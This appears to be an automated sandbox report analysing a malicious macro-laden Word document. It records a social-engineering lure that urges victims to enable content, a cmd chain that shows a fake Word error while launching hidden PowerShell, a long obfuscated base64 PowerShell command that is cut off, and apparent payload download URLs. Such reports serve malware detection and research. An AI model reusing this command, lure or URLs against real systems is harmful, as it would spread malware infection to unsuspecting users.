Source: EBBBFCCB-40A6-407F-8E1B-936E8948873B.0.dr | String found in binary or memory: https://r4.res.office365.com/footprintconfig/v1.7/scripts/fpconfig.json
Source: EBBBFCCB-40A6-407F-8E1B-936E8948873B.0.dr | String found in binary or memory: https://res.getmicrosoftkey.com/api/redemptionevents
Source: EBBBFCCB-40A6-407F-8E1B-936E8948873B.0.dr | String found in binary or memory: https://rpsticket.partnerservices.getmicrosoftkey.com
Source: EBBBFCCB-40A6-407F-8E1B-936E8948873B.0.dr | String found in binary or memory: https://settings.outlook.com
Source: EBBBFCCB-40A6-407F-8E1B-936E8948873B.0.dr | String found in binary or memory: https://shell.suite.office.com:1443
Source: EBBBFCCB-40A6-407F-8E1B-936E8948873B.0.dr | String found in binary or memory: https://skyapi.live.net/Activity/
Source: EBBBFCCB-40A6-407F-8E1B-936E8948873B.0.dr | String found in binary or memory: https://sr.outlook.office.net/ws/speech/recognize/assistant/work
Source: EBBBFCCB-40A6-407F-8E1B-936E8948873B.0.dr | String found in binary or memory: https://staging.cortana.ai
Source: EBBBFCCB-40A6-407F-8E1B-936E8948873B.0.dr | String found in binary or memory: https://storage.live.com/clientlogs/uploadlocation
Source: EBBBFCCB-40A6-407F-8E1B-936E8948873B.0.dr | String found in binary or memory: https://store.office.cn/addinstemplate
Source: EBBBFCCB-40A6-407F-8E1B-936E8948873B.0.dr | String found in binary or memory: https://store.office.com/?productgroup=Outlook
Source: EBBBFCCB-40A6-407F-8E1B-936E8948873B.0.dr | String found in binary or memory: https://store.office.com/addinstemplate
Source: EBBBFCCB-40A6-407F-8E1B-936E8948873B.0.dr | String found in binary or memory: https://store.office.de/addinstemplate
Source: EBBBFCCB-40A6-407F-8E1B-936E8948873B.0.dr | String found in binary or memory: https://store.officeppe.com/addinstemplate
Source: EBBBFCCB-40A6-407F-8E1B-936E8948873B.0.dr | String found in binary or memory: https://syncservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
Source: EBBBFCCB-40A6-407F-8E1B-936E8948873B.0.dr | String found in binary or memory: https://tasks.office.com
Source: EBBBFCCB-40A6-407F-8E1B-936E8948873B.0.dr | String found in binary or memory: https://templatelogging.office.com/client/log
Source: EBBBFCCB-40A6-407F-8E1B-936E8948873B.0.dr | String found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.desktop.html
Source: EBBBFCCB-40A6-407F-8E1B-936E8948873B.0.dr | String found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.immersive.html
Source: EBBBFCCB-40A6-407F-8E1B-936E8948873B.0.dr | String found in binary or memory: https://visio.uservoice.com/forums/368202-visio-on-devices
Source: EBBBFCCB-40A6-407F-8E1B-936E8948873B.0.dr | String found in binary or memory: https://web.microsoftstream.com/video/
Source: EBBBFCCB-40A6-407F-8E1B-936E8948873B.0.dr | String found in binary or memory: https://webdir.online.lync.com/autodiscover/autodiscoverservice.svc/root/
Source: EBBBFCCB-40A6-407F-8E1B-936E8948873B.0.dr | String found in binary or memory: https://webshell.suite.office.com
Source: EBBBFCCB-40A6-407F-8E1B-936E8948873B.0.dr | String found in binary or memory: https://word.uservoice.com/forums/304948-word-for-ipad-iphone-ios
Source: EBBBFCCB-40A6-407F-8E1B-936E8948873B.0.dr | String found in binary or memory: https://wus2.contentsync.
Source: EBBBFCCB-40A6-407F-8E1B-936E8948873B.0.dr | String found in binary or memory: https://wus2.pagecontentsync.
Source: EBBBFCCB-40A6-407F-8E1B-936E8948873B.0.dr | String found in binary or memory: https://www.bingapis.com/api/v7/urlpreview/search?appid=E93048236FE27D972F67C5AF722136866DF65FA2
Source: powershell.exe, 00000005.00000002.338976732.0000019232788000.00000004.00000001.sdmp | String found in binary or memory: https://www.calltorepair.com
Source: powershell.exe, 00000005.00000002.338976732.0000019232788000.00000004.00000001.sdmp | String found in binary or memory: https://www.calltorepair.com//
Source: powershell.exe, 00000005.00000002.338976732.0000019232788000.00000004.00000001.sdmp | String found in binary or memory: https://www.calltorepair.com/about-us/
Source: powershell.exe, 00000005.00000002.338769822.0000019232712000.00000004.00000001.sdmp, powershell.exe, 00000005.00000002.338976732.0000019232788000.00000004.00000001.sdmp | String found in binary or memory: https://www.calltorepair.com/assets/09erZFF/
Source: powershell.exe, 00000005.00000002.338976732.0000019232788000.00000004.00000001.sdmp | String found in binary or memory: https://www.calltorepair.com/blog/
Source: powershell.exe, 00000005.00000002.338976732.0000019232788000.00000004.00000001.sdmp | String found in binary or memory: https://www.calltorepair.com/comments/feed/
Source: powershell.exe, 00000005.00000002.338976732.0000019232788000.00000004.00000001.sdmp | String found in binary or memory: https://www.calltorepair.com/contact/
Source: powershell.exe, 00000005.00000002.338976732.0000019232788000.00000004.00000001.sdmp | String found in binary or memory: https://www.calltorepair.com/feed/
Source: powershell.exe, 00000005.00000002.338976732.0000019232788000.00000004.00000001.sdmp | String found in binary or memory: https://www.calltorepair.com/project/great-project/
Source: powershell.exe, 00000005.00000002.338976732.0000019232788000.00000004.00000001.sdmp | String found in binary or memory: https://www.calltorepair.com/project/luv-summer/
Source: powershell.exe, 00000005.00000002.338976732.0000019232788000.00000004.00000001.sdmp | String found in binary or memory: https://www.calltorepair.com/project/the-beauty/
Source: powershell.exe, 00000005.00000002.338976732.0000019232788000.00000004.00000001.sdmp | String found in binary or memory: https://www.calltorepair.com/project/trending-couple/
Source: powershell.exe, 00000005.00000002.338976732.0000019232788000.00000004.00000001.sdmp | String found in binary or memory: https://www.calltorepair.com/project/world-business/
Source: powershell.exe, 00000005.00000002.338976732.0000019232788000.00000004.00000001.sdmp | String found in binary or memory: https://www.calltorepair.com/wp-admin/admin-ajax.php
Source: powershell.exe, 00000005.00000002.338976732.0000019232788000.00000004.00000001.sdmp | String found in binary or memory: https://www.calltorepair.com/wp-content/plugins/LayerSlider/static/layerslider/css/layerslider.css
Source: powershell.exe, 00000005.00000002.338976732.0000019232788000.00000004.00000001.sdmp | String found in binary or memory: https://www.calltorepair.com/wp-content/plugins/LayerSlider/static/layerslider/js/greensock.js
Source: powershell.exe, 00000005.00000002.338976732.0000019232788000.00000004.00000001.sdmp | String found in binary or memory: https://www.calltorepair.com/wp-content/plugins/LayerSlider/static/layerslider/js/layerslider.kreatu
Source: powershell.exe, 00000005.00000002.338976732.0000019232788000.00000004.00000001.sdmp | String found in binary or memory: https://www.calltorepair.com/wp-content/plugins/LayerSlider/static/layerslider/js/layerslider.transi
Source: powershell.exe, 00000005.00000002.338976732.0000019232788000.00000004.00000001.sdmp | String found in binary or memory: https://www.calltorepair.com/wp-content/plugins/contact-form-7/includes/css/styles.css
Source: powershell.exe, 00000005.00000002.338976732.0000019232788000.00000004.00000001.sdmp | String found in binary or memory: https://www.calltorepair.com/wp-content/plugins/revslider/public/assets/css/rs6.css
Source: powershell.exe, 00000005.00000002.338976732.0000019232788000.00000004.00000001.sdmp | String found in binary or memory: https://www.calltorepair.com/wp-content/plugins/revslider/public/assets/js/rbtools.min.js
Source: powershell.exe, 00000005.00000002.338976732.0000019232788000.00000004.00000001.sdmp | String found in binary or memory: https://www.calltorepair.com/wp-content/plugins/revslider/public/assets/js/rs6.min.js
Source: powershell.exe, 00000005.00000002.338976732.0000019232788000.00000004.00000001.sdmp | String found in binary or memory: https://www.calltorepair.com/wp-content/themes/thefox/css/animations.css
Source: powershell.exe, 00000005.00000002.338976732.0000019232788000.00000004.00000001.sdmp | String found in binary or memory: https://www.calltorepair.com/wp-content/themes/thefox/css/elegant.css
Source: powershell.exe, 00000005.00000002.338976732.0000019232788000.00000004.00000001.sdmp | String found in binary or memory: https://www.calltorepair.com/wp-content/themes/thefox/css/font-awesome.css
Source: powershell.exe, 00000005.00000002.338976732.0000019232788000.00000004.00000001.sdmp | String found in binary or memory: https://www.calltorepair.com/wp-content/themes/thefox/css/moon.css
Source: powershell.exe, 00000005.00000002.338976732.0000019232788000.00000004.00000001.sdmp | String found in binary or memory: https://www.calltorepair.com/wp-content/themes/thefox/css/rgs.css
Source: powershell.exe, 00000005.00000002.338976732.0000019232788000.00000004.00000001.sdmp | String found in binary or memory: https://www.calltorepair.com/wp-content/themes/thefox/css/thefox_js_composer.css
Source: powershell.exe, 00000005.00000002.338976732.0000019232788000.00000004.00000001.sdmp | String found in binary or memory: https://www.calltorepair.com/wp-content/themes/thefox/images/404_default.png
Source: powershell.exe, 00000005.00000002.338976732.0000019232788000.00000004.00000001.sdmp | String found in binary or memory: https://www.calltorepair.com/wp-content/themes/thefox/images/loader.gif
Source: powershell.exe, 00000005.00000002.338976732.0000019232788000.00000004.00000001.sdmp | String found in binary or memory: https://www.calltorepair.com/wp-content/themes/thefox/includes/Flexslider/flexslider.css
Source: powershell.exe, 00000005.00000002.338976732.0000019232788000.00000004.00000001.sdmp | String found in binary or memory: https://www.calltorepair.com/wp-content/themes/thefox/includes/prettyPhoto/css/prettyPhoto.css
Source: powershell.exe, 00000005.00000002.338976732.0000019232788000.00000004.00000001.sdmp | String found in binary or memory: https://www.calltorepair.com/wp-content/themes/thefox/includes/zilla-likes/styles/zilla-likes.css
Source: powershell.exe, 00000005.00000002.338976732.0000019232788000.00000004.00000001.sdmp | String found in binary or memory: https://www.calltorepair.com/wp-content/themes/thefox/js/css3-mediaqueries.js
Source: powershell.exe, 00000005.00000002.338976732.0000019232788000.00000004.00000001.sdmp | String found in binary or memory: https://www.calltorepair.com/wp-content/themes/thefox/js/html5.js
Source: powershell.exe, 00000005.00000002.338976732.0000019232788000.00000004.00000001.sdmp | String found in binary or memory: https://www.calltorepair.com/wp-content/themes/thefox/js/scrollmagic.js
Source: powershell.exe, 00000005.00000002.338976732.0000019232788000.00000004.00000001.sdmp | String found in binary or memory: https://www.calltorepair.com/wp-content/themes/thefox/media-queries_wide.css
Source: powershell.exe, 00000005.00000002.338976732.0000019232788000.00000004.00000001.sdmp | String found in binary or memory: https://www.calltorepair.com/wp-content/themes/thefox/style.css
Source: powershell.exe, 00000005.00000002.338976732.0000019232788000.00000004.00000001.sdmp | String found in binary or memory: https://www.calltorepair.com/wp-content/themes/thefox/style_end.css
Source: powershell.exe, 00000005.00000002.338976732.0000019232788000.00000004.00000001.sdmp | String found in binary or memory: https://www.calltorepair.com/wp-content/uploads/2021/01/big_mob_logo-1.png
Source: powershell.exe, 00000005.00000002.338976732.0000019232788000.00000004.00000001.sdmp | String found in binary or memory: https://www.calltorepair.com/wp-content/uploads/2021/01/favicon.png
Source: powershell.exe, 00000005.00000002.338976732.0000019232788000.00000004.00000001.sdmp | String found in binary or memory: https://www.calltorepair.com/wp-content/uploads/2021/01/light_logo-300x115.png
Source: powershell.exe, 00000005.00000002.338976732.0000019232788000.00000004.00000001.sdmp | String found in binary or memory: https://www.calltorepair.com/wp-content/uploads/2021/01/light_logo.png
Source: powershell.exe, 00000005.00000002.338976732.0000019232788000.00000004.00000001.sdmp | String found in binary or memory: https://www.calltorepair.com/wp-content/uploads/2021/01/logo_v_low.png
Source: powershell.exe, 00000005.00000002.338976732.0000019232788000.00000004.00000001.sdmp | String found in binary or memory: https://www.calltorepair.com/wp-includes/css/dist/block-library/style.min.css
Source: powershell.exe, 00000005.00000002.338976732.0000019232788000.00000004.00000001.sdmp | String found in binary or memory: https://www.calltorepair.com/wp-includes/js/jquery/jquery-migrate.min.js
Source: powershell.exe, 00000005.00000002.338976732.0000019232788000.00000004.00000001.sdmp | String found in binary or memory: https://www.calltorepair.com/wp-includes/js/jquery/jquery.min.js
Source: powershell.exe, 00000005.00000002.338976732.0000019232788000.00000004.00000001.sdmp | String found in binary or memory: https://www.calltorepair.com/wp-includes/wlwmanifest.xml
Source: powershell.exe, 00000005.00000002.338976732.0000019232788000.00000004.00000001.sdmp | String found in binary or memory: https://www.calltorepair.com/wp-json/
Source: powershell.exe, 00000005.00000002.338976732.0000019232788000.00000004.00000001.sdmp | String found in binary or memory: https://www.calltorepair.com/xmlrpc.php?rsd
Source: powershell.exe, 00000005.00000002.338976732.0000019232788000.00000004.00000001.sdmp | String found in binary or memory: https://www.instagram.com/calltorepair/
Source: EBBBFCCB-40A6-407F-8E1B-936E8948873B.0.dr | String found in binary or memory: https://www.odwebp.svc.ms
Source: powershell.exe, 00000005.00000002.338976732.0000019232788000.00000004.00000001.sdmp | String found in binary or memory: https://www.youtube.com/channel/UC9vlmpCi8mAWSIwah-4A6PA/featured
Source: powershell.exe, 00000005.00000002.338976732.0000019232788000.00000004.00000001.sdmp | String found in binary or memory: https://xuanthinhshop.com
Source: powershell.exe, 00000005.00000002.339541174.00000192328D0000.00000004.00000001.sdmp | String found in binary or memory: https://xuanthinhshop.com/acura-mdx-snck0/2LU7w/
Source: powershell.exe, 00000005.00000002.338976732.0000019232788000.00000004.00000001.sdmp | String found in binary or memory: https://xuanthinhshop.comx
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49722
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49721
Source: unknownNetwork traffic detected: HTTP traffic on port 49726 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49721 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49722 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49723 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49723
Source: unknownHTTPS traffic detected: 107.180.2.185:443 -> 192.168.2.5:49722 version: TLS 1.2
Source: unknownHTTPS traffic detected: 107.180.2.185:443 -> 192.168.2.5:49723 version: TLS 1.2

System Summary:

Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Source: Screenshot number: 8 | Screenshot OCR: ENABLE EDITING" and "ENABLE CONTENT" buttons to preview this document. k End of document W Screen
Source: Screenshot number: 8 | Screenshot OCR: DOCUMENT IS PROTECTED. Previewing is not available for protected documents. You have to press "ENA
Source: Screenshot number: 8 | Screenshot OCR: protected documents. You have to press "ENABLE EDITING" and "ENABLE CONTENT" buttons to preview thi
Source: Screenshot number: 8 | Screenshot OCR: ENABLE CONTENT" buttons to preview this document. k End of document W Screen 1 of 1 O Type here
Source: Document image extraction number: 0 | Screenshot OCR: ENABLE EDITING" and "ENABLE CONTENT" buttons to preview this document.
Source: Document image extraction number: 0 | Screenshot OCR: protected documents. You have to press "ENABLE EDITING" and "ENABLE CONTENT" buttons to preview thi
Source: Document image extraction number: 0 | Screenshot OCR: ENABLE CONTENT" buttons to preview this document.
Source: Document image extraction number: 1 | Screenshot OCR: ENABLE EDITING" and "ENABLE CONTENT" buttons to preview this document.
Source: Document image extraction number: 1 | Screenshot OCR: DOCUMENT IS PROTECTED. Previewing is not available for protected documents. You have to press "ENA
Source: Document image extraction number: 1 | Screenshot OCR: protected documents. You have to press "ENABLE EDITING" and "ENABLE CONTENT" buttons to preview thi
Source: Document image extraction number: 1 | Screenshot OCR: ENABLE CONTENT" buttons to preview this document.
Very long command line found
Source: unknown | Process created: Commandline size = 7880
Source: unknown | Process created: Commandline size = 7789
Source: C:\Windows\System32\cmd.exe | Process created: Commandline size = 7789
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 5_2_00007FFA16250CD0 | 5_2_00007FFA16250CD0
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 5_2_00007FFA16250D30 | 5_2_00007FFA16250D30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 5_2_00007FFA16250D7F | 5_2_00007FFA16250D7F
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 5_2_00007FFA16250D87 | 5_2_00007FFA16250D87
Source: Adjunto K_23165.doc | OLE, VBA macro line: Private Sub Document_open()
Source: VBA code instrumentation | OLE, VBA macro: Module Ntx3xle2gjt1, Function Document_open | Name: Document_open
Source: Adjunto K_23165.doc | OLE indicator, VBA macros: true
Source: 00000005.00000002.345480292.000001924A410000.00000004.00000001.sdmp, type: MEMORY | Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 00000005.00000002.340406464.0000019232AD8000.00000004.00000001.sdmp, type: MEMORY | Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 00000005.00000002.340509636.0000019232B22000.00000004.00000001.sdmp, type: MEMORY | Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 00000005.00000002.341303023.0000019232EE5000.00000004.00000001.sdmp, type: MEMORY | Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 00000005.00000003.262229379.000001924A61C000.00000004.00000001.sdmp, type: MEMORY | Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 00000005.00000002.337081458.00000192305F5000.00000004.00000040.sdmp, type: MEMORY | Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 00000005.00000003.336047915.000001924A6AB000.00000004.00000001.sdmp, type: MEMORY | Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 00000005.00000002.339130346.00000192327E7000.00000004.00000001.sdmp, type: MEMORY | Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 00000005.00000002.340312638.0000019232A8D000.00000004.00000001.sdmp, type: MEMORY | Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 00000005.00000002.339329271.000001923285D000.00000004.00000001.sdmp, type: MEMORY | Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 00000005.00000002.340170127.0000019232A43000.00000004.00000001.sdmp, type: MEMORY | Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 00000005.00000002.340568266.0000019232B5B000.00000004.00000001.sdmp, type: MEMORY | Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 00000005.00000002.337304488.0000019231EA0000.00000004.00000040.sdmp, type: MEMORY | Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 00000005.00000002.340038608.00000192329F8000.00000004.00000001.sdmp, type: MEMORY | Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 00000005.00000002.340632134.0000019232B85000.00000004.00000001.sdmp, type: MEMORY | Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 00000005.00000002.346005102.000001924A6AB000.00000004.00000001.sdmp, type: MEMORY | Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 00000005.00000003.335945822.000001924A6BB000.00000004.00000001.sdmp, type: MEMORY | Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 00000005.00000002.339894658.00000192329AE000.00000004.00000001.sdmp, type: MEMORY | Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: classification engine | Classification label: mal100.troj.evad.winDOC@7/15@9/6
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE | File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.Word
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6284:120:WilError_01
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE | File created: C:\Users\user\AppData\Local\Temp\{115C999D-9F7F-4C70-9DB6-9BD86E6F1B87} - OProcSessId.dat
Source: Adjunto K_23165.doc | OLE indicator, Word Document stream: true
Source: Adjunto K_23165.doc | OLE document summary: title field not present or empty
Source: Adjunto K_23165.doc | OLE document summary: edited time not present or 0
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE | WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE | File read: C:\Users\desktop.ini
Source: C:\Windows\System32\msg.exe | Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File read: C:\Windows\System32\drivers\etc\hosts
Source: Adjunto K_23165.doc | Virustotal: Detection: 69%
Source: Adjunto K_23165.doc | Metadefender: Detection: 54%
Source: Adjunto K_23165.doc | ReversingLabs: Detection: 85%
Source: unknown | Process created: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE 'C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE' /Automation -Embedding
Source: unknown | Process created: C:\Windows\System32\cmd.exe cmd cmd cmd cmd /c msg %username% /v Word experienced an error trying to open the file. & POwersheLL -w hidden -ENCOD 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
Source: unknown | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown | Process created: C:\Windows\System32\msg.exe msg user /v Word experienced an error trying to open the file.
Source: unknown | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwersheLL -w hidden -ENCOD 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
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\msg.exe msg user /v Word experienced an error trying to open the file.
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwersheLL -w hidden -ENCOD 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
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE | Window found: window name: SysTabControl32
Source: Window Recorder | Window detected: More than 3 window changes detected
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguages
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE | File opened: C:\Windows\SysWOW64\MSVCR100.dll
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000005.00000003.336147480.000001924A3A2000.00000004.00000001.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdbn source: powershell.exe, 00000005.00000003.336147480.000001924A3A2000.00000004.00000001.sdmp
Source: Binary string: System.pdb source: powershell.exe, 00000005.00000003.335909907.000001924A3DA000.00000004.00000001.sdmp
Source: Adjunto K_23165.doc | Initial sample: OLE summary subject = Communications transmit paradigms Liaison Walks Orchestrator Crossroad middleware

Data Obfuscation:

Document contains an embedded VBA with many GOTO operations indicating source code obfuscation
Source: Adjunto K_23165.doc | Stream path 'Macros/VBA/T1f2hilsywf9dq' : High number of GOTO operations
Source: VBA code instrumentation | OLE, VBA macro, High number of GOTO operations: Module T1f2hilsywf9dq | Name: T1f2hilsywf9dq
PowerShell case anomaly found
Source: unknown | Process created: C:\Windows\System32\cmd.exe cmd cmd cmd cmd /c msg %username% /v Word experienced an error trying to open the file. & POwersheLL -w hidden -ENCOD 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
Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwersheLL -w hidden -ENCOD IAAgACQAYwBWAE4AZwBBAFMAPQAgAFsAVAB5AFAAZQBdACgAIgB7ADEAfQB7ADAAfQB7ADMAfQB7ADIAfQAiAC0ARgAgACcAWQBTAFQAZQBNAC4ASQAnACwAJwBTACcALAAnAFIAeQAnACwAJwBPAC4ARABpAHIARQBDAFQAbwAnACkAOwAgACAAIABzAGUAdAAtAEkAVABFAE0AIAAoACIAdgBhAHIAaQBhAEIAbABlACIAKwAiADoAbAA2AFUAIgArACIAWQBIACIAKwAiAE4AIgApACAAIAAoAFsAVABZAHAAZQBdACgAIgB7ADUAfQB7ADAAfQB7ADcAfQB7ADQAfQB7ADgAfQB7ADIAfQB7ADMAfQB7ADYAfQB7ADEAfQAiAC0ARgAgACcAWQAnACwAJwBHAGUAcgAnACwAJwBFAFAAbwBJACcALAAnAE4AdABtACcALAAnAFQARQBNAC4ATgBlAHQALgBzAGUAJwAsACcAcwAnACwAJwBBAG4AQQAnACwAJwBzACcALAAnAFIAdgBJAGMAJwApACkAOwAgACQAWABkAHoAXwB0AF8AaQA9ACgAJwBBAHUAJwArACgAJwB6ADAAegAnACsAJwBxAHgAJwApACkAOwAkAFAAaQBpADgAbwBlAG4APQAkAEIAMAB4AGsAMAA0AHIAIAArACAAWwBjAGgAYQByAF0AKAA2ADQAKQAgACsAIAAkAFYAYQBsADYAcQBhAHgAOwAkAEwAcgBfAGwAcQBuAHcAPQAoACgAJwBQAGsAJwArACcAOQAnACkAKwAoACcAMQAnACsAJwA1AHcAJwApACsAJwBvACcAKQA7ACAAKAAgACAAaQBUAEUATQAgAHYAYQByAEkAQQBCAGwARQA6AEMAdgBuAGcAQQBTACkALgB2AEEAbABVAEUAOgA6ACIAQwBSAEUAQQBUAGUAYABkAGkAYABSAGUAQwB0AE8AUgBZACIAKAAkAEgATwBNAEUAIAArACAAKAAoACcAewAnACsAJwAwAH0AWQAnACsAJwA1ACcAKwAnADUAOQBqAHMAdgB7ADAAfQBJAGUAdwBmAG0AeQAzACcAKwAnAHsAJwArACcAMAB9ACcAKQAgACAALQBGAFsAQwBIAGEAUgBdADkAMgApACkAOwAkAE0AXwBkAG4AYgBzADQAPQAoACcAUQAnACsAKAAnAHUAJwArACcAZwBzACcAKQArACgAJwB5AG8AJwArACcAZAAnACkAKQA7ACAAIAAoAEcAZQB0AC0AaQBUAGUAbQAgACgAIgB2AGEAUgBJAGEAQgBMAGUAIgArACIAOgBsADYAdQAiACsAIgBZAEgAIgArACIAbgAiACkAKQAuAHYAYQBMAHUARQA6ADoAIgBzAEUAQwB1AFIAYABJAFQAYAB5AHAAcgBPAFQAYABvAGMATwBMACIAIAA9ACAAKAAoACcAVABsACcAKwAnAHMAJwApACsAJwAxADIAJwApADsAJABYADIAdABoAHEAbQBnAD0AKAAnAEoAJwArACgAJwB6AHoAJwArACcAegA2ACcAKwAnADIAbQAnACkAKQA7ACQAUQBvAGMAeQBfAGIAZwAgAD0AIAAoACgAJwBQAHAAJwArACcAbgBxACcAKQArACcAOQBqACcAKQA7ACQAWgB5ADcAegA3AGgAZAA9ACgAJwBGAGcAJwArACcAMAA0ACcAKwAoACcAYwBjACcAKwAnAGcAJwApACkAOwAkAEUANQBwAGEAbQA0AGUAPQAoACcAVwBpACcAKwAoACcAMAAnACsAJwA4AGoAJwApACsAJwBhAHkAJwApADsAJABUAHAAZAB1AGUAMwAyAD0AJABIAE8ATQBFACsAKA
